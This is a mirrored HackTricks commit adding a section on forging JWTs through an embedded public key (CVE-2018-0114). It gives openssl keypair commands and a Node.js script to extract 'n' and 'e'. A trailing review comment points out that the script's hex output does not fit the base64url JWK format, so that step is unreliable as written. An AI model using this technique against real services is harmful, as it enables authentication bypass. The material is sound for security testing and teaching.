mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
GitBook: [master] one page and one asset modified
This commit is contained in:
parent
f518621c68
commit
9ffcb20c53
BIN
.gitbook/assets/image (436).png
Normal file
@ -131,6 +131,34 @@ Try to change this header to an URL under your control and check if any request
You can also abuse both of these vulns if Open redirects, header injection or if you can upload a file inside the server and the server is just whitelisting the domain and not the path.
## Embedded Public Key \(CVE-2018-0114\)
If the JWT has embedded a public key like in the following scenario:
![](../.gitbook/assets/image%20%28436%29.png)
It's possible to generate a new private/public key, embeded the new public key inside the token and use it to generate a new signature:
```bash
openssl genrsa -out keypair.pem 2048
openssl rsa -in keypair.pem -pubout -out publickey.crt
openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key
```
You can obtain the "n" and "e" using this nodejs script:
```bash
const NodeRSA = require('node-rsa');
const fs = require('fs');
keyPair = fs.readFileSync("keypair.pem");
const key = new NodeRSA(keyPair);
const publicComponents = key.exportKey('components-public');
console.log('Parameter n: ', publicComponents.n.toString("hex"));
console.log('Parameter e: ', publicComponents.e.toString(16));
```
Finally, using the public and private key and the new "n" and "e" values you can use [jwt.io](https://jwt.io/) to forge a new valid JWT with any information.
## JWT Registered claims
{% embed url="https://www.iana.org/assignments/jwt/jwt.xhtml\#claims" caption="" %}
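Review bot: the values the Node script prints are hex (`publicComponents.n.toString("hex")`, `publicComponents.e.toString(16)`), but a JWT `jwk` header carries `n` and `e` as base64url-encoded unsigned big-endian integers (RFC 7518, section 6.3.1), so the text before "Finally, using the public and private key..." should say the hex output has to be converted before it is pasted into the token header; as written, a reader produces a key the server cannot parse. Also the second fence is tagged `bash` but holds a Node.js script (`const NodeRSA = require('node-rsa');`), so tag it `javascript`, and `keyPair = fs.readFileSync("keypair.pem");` is missing `const`. Minor: "embeded" should be "embedded" in the sentence above the openssl block. Since this section documents a server accepting the key supplied inside the token, a one-line remediation (resolve keys only from a server-side allowlist and never from the token's own `jwk` or `jku` header) would make the page useful to readers fixing the issue, not just finding it.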